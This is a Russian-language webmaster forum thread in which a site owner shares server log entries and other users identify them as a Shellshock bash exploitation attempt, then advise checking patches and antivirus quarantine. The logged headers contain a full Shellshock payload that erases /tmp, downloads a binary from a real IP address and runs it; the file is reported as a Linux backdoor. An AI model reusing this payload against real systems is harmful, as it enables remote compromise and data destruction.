- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня в логах обнаружил обращение к серверу со странными HTTP_REFERER и HTTP_USER_AGENT, а именно:
HTTP_REFERER => () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://23.234.29.209:8806/cctv2 -O /tmp/China.Z-hewi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hewi >> /tmp/Run.sh;echo /tmp/China.Z-hewi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
HTTP_USER_AGENT => () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://23.234.29.209:8806/cctv2 -O /tmp/China.Z-hewi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hewi >> /tmp/Run.sh;echo /tmp/China.Z-hewi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Решил полюбопытствовать. Скачал через download master файл размером 800 Кб с адреса http://23.234.29.209:8806/cctv2 , затем решил его проверить касперским, нажал правой кнопкой и в меню выбрал "Проверить на вирусы" в итоге файл исчез, а касперский так и не запустился. Скачав себе на пк данный файл я совершил ошибку? Кто-нибудь сталкивался с чем либо подобным?
s-serg, при вызове контекстного меню, вы обратились к файлу. Антивирус проверяет каждое обращение в реальном времени. Соответственно, скорее всего, файл был добавлен в карантин.
Смотрите отчеты и объекты на карантине в своем антивирусе.
Файл оказался в карантине, обнаружено Backdoor.Linux.Mayday.g
s-serg, для Windows он не опасен. Можете исключить из карантина и продолжить исследование дальше.
Пытаются найти уязвимость в bash-е, пол-года - год назад была в нем дыра, возможно не все еще пропатчились.
Линк: /ru/forum/867276
admak, причем заголовок файла, /tmp/China.Z-hew, как бы намекает чьих рук дело. :)
Советую тс-у проверить - не подвержен ли баш на его сервере уязвимости шелл-шок.
Если все пропатчено - нечего волноваться.
Такое почти ежедневно в логах вижу....